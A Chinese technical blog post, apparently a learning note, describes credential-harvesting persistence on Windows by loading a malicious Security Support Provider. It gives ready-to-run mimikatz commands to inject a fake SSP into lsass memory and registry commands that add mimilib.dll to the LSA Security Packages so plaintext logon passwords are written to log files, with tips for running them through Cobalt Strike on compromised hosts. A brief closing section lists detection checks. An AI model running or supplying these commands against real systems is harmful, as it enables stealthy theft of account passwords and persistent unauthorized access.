您现在的位置是:首页 >技术杂谈 >权限维持-SSP-DLL 加载网站首页技术杂谈
权限维持-SSP-DLL 加载
简介权限维持-SSP-DLL 加载
前言
继续学习中,今天是权限维持的东西,大家永远不要忘记初心,要一起奋斗哦!
注:单机环境和域环境都可以使用
复现
一.进程注入lsass.exe
使用mimikatz将伪造的SSP注入内存,这样用户在注销重新登录的时候就在C:Windowssystem32mimilsa.log中留下账号和明文密码了
缺点:如果域控制器重启了,伪造的SSP就会没了
1.使用cs
我们对上线的主机使用下列操作,然后将主机注销登录
然后我们就在C:Windowssystem32mimilsa.log中,发现了账号和明文密码
2.直接使用mimikatz.exe
直接执行下面这串命令就可以了
mimikatz.exe "privilege::debug" "misc::memssp" exit
二.使用dll操作
mimikatz下载地址:Releases · gentilkiwi/mimikatz · GitHub
这里我们使用cs自带,将mimikatz中的mimilib.dll上传上去
或者可以在执行copy mimilib.dll %systemroot%system32,前提你这个地方有mimilib.dll,机子重启后他的密码就会被记录在C:Windowssystem32kiwissp.log中。注:dll文件的位数要和机子一样
缺点:注册表需要重启生效,实战中不可能重启别人的靶机吧,所以可以和上面一种方法结合。
首先使用命令,查询这个注册表项是否有东西,因为有东西的话,使用修改注册表的命令,他就会让你输入yes是否修改,然后cs会一直弹出这些东西,你就卡死。
powershell reg query hklmsystemcurrentcontrolsetcontrollsa /v "Security Packages"
//修改注册表
注册表有东西
powershell echo yes|reg add "hklmsystemcurrentcontrolsetcontrollsa" /v "Security Packages" /d "kerberos msv1_0 schannel wdigest tspkg pku2u mimilib" /t REG_MULTI_SZ
注册表没有东西
powershell reg add "hklmsystemcurrentcontrolsetcontrollsa" /v "Security Packages" /d "kerberos msv1_0 schannel wdigest tspkg pku2u mimilib" /t REG_MULTI_SZ
这里我们重启后,查看C:Windowssystem32kiwissp.log文件发现账号和明文密码。
自查
1.检测C:WindowsSystem32中有没有可疑dll文件或者log文件
2.使用火绒剑进行钩子扫描
风语者!平时喜欢研究各种技术,目前在从事后端开发工作,热爱生活、热爱工作。